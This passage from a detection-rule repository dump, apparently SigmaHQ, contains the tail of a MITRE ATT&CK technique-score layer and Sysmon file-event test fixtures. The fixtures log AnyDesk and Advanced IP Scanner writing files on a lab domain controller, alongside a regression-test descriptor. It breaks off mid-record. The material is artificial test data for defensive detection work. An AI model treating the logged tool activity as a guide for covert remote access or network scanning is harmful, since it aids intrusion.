\"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574\",\n      \"tactic\": \"persistence\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1039\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1570\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1216.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1110.001\",\n      \"tactic\": \"credential-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1110.002\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1222.001\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1217\",\n      \"tactic\": \"discovery\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1622\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1622\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.004\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.004\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1059.006\",\n      \"tactic\": \"execution\",\n      \"score\": 8,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.007\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1620\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1069\",\n      \"tactic\": \"discovery\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.001\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1037.001\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1135\",\n      \"tactic\": \"discovery\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1185\",\n      \"tactic\": \"collection\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1505.004\",\n      \"tactic\": \"persistence\",\n      \"score\": 5,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1003.006\",\n      \"tactic\": \"credential-access\",\n      \"score\": 7,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1006\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.013\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.013\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137\",\n      \"tactic\": \"persistence\",\n      \"score\": 9,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1008\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137.006\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1136.002\",\n      \"tactic\": \"persistence\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.009\",\n      \"tactic\": \"persistence\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.009\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 4,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1137.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1195\",\n      \"tactic\": \"initial-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.015\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.015\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1001.003\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1114.001\",\n      \"tactic\": \"collection\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1222\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1589.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.012\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.012\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1574.012\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.010\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.010\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1125\",\n      \"tactic\": \"collection\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.009\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.009\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.008\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.008\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.005\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.003\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1547.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.012\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1546.012\",\n      \"tactic\": \"persistence\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1559.002\",\n      \"tactic\": \"execution\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1550.002\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 6,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1553.002\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1207\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1010\",\n      \"tactic\": \"discovery\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.005\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1134.005\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1200\",\n      \"tactic\": \"initial-access\",\n      \"score\": 3,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.003\",\n      \"tactic\": \"credential-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1557.003\",\n      \"tactic\": \"collection\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1091\",\n      \"tactic\": \"lateral-movement\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1091\",\n      \"tactic\": \"initial-access\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1590.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1499.001\",\n      \"tactic\": \"impact\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1176\",\n      \"tactic\": \"persistence\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1595.001\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.003\",\n      \"tactic\": \"privilege-escalation\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1548.003\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1559\",\n      \"tactic\": \"execution\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1564.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1090.004\",\n      \"tactic\": \"command-and-control\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1598.002\",\n      \"tactic\": \"reconnaissance\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1036.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 1,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    },\n    {\n      \"techniqueID\": \"T1070.008\",\n      \"tactic\": \"defense-evasion\",\n      \"score\": 2,\n      \"color\": \"\",\n      \"comment\": \"\",\n      \"enabled\": true,\n      \"metadata\": [],\n      \"links\": [],\n      \"showSubtechniques\": false\n    }\n  ]\n}"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:36:29.111126Z\"\n        }\n      },\n      \"EventRecordID\": 18267,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:36:29.110\",\n      \"ProcessGuid\": \"5AA13A44-0D74-68FC-EB1D-000000004002\",\n      \"ProcessId\": 5624,\n      \"Image\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\is-3C3LU.tmp\\\\Advanced_IP_Scanner_2.5.4594.1(1).tmp\",\n      \"TargetFilename\": \"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2\\\\platforms\\\\qwindows.dll\",\n      \"CreationUtcTime\": \"2025-10-24 10:44:35.897\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml",
    "content": "id: 48ff85e7-a8ae-43fd-8a8f-16ce51a92183\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: fed85bf9-e075-4280-9159-fbe8a023d6fa\n      title: Advanced IP Scanner - File Event\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/file/file_event/file_event_win_advanced_ip_scanner/fed85bf9-e075-4280-9159-fbe8a023d6fa.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/file/file_event/file_event_win_anydesk_artefact/0b9ad457-2554-44c1-82c2-d56a99c42377.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.640670Z\"\n        }\n      },\n      \"EventRecordID\": 14961,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.634\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DC1D-000000004002\",\n      \"ProcessId\": 7760,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\service.conf.new\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:32.457\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 11,\n      \"Version\": 2,\n      \"Level\": 4,\n      \"Task\": 11,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-24T23:34:34.644616Z\"\n        }\n      },\n      \"EventRecordID\": 14963,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-24 23:34:34.634\",\n      \"ProcessGuid\": \"5AA13A44-0D08-68FC-DC1D-000000004002\",\n      \"ProcessId\": 7760,\n      \"Image\": \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\AnyDesk.exe\",\n      \"TargetFilename\": \"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\AnyDesk\\\\service.conf~RF2d9c1fe.TMP\",\n      \"CreationUtcTime\": \"2025-10-24 23:34:34.634\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    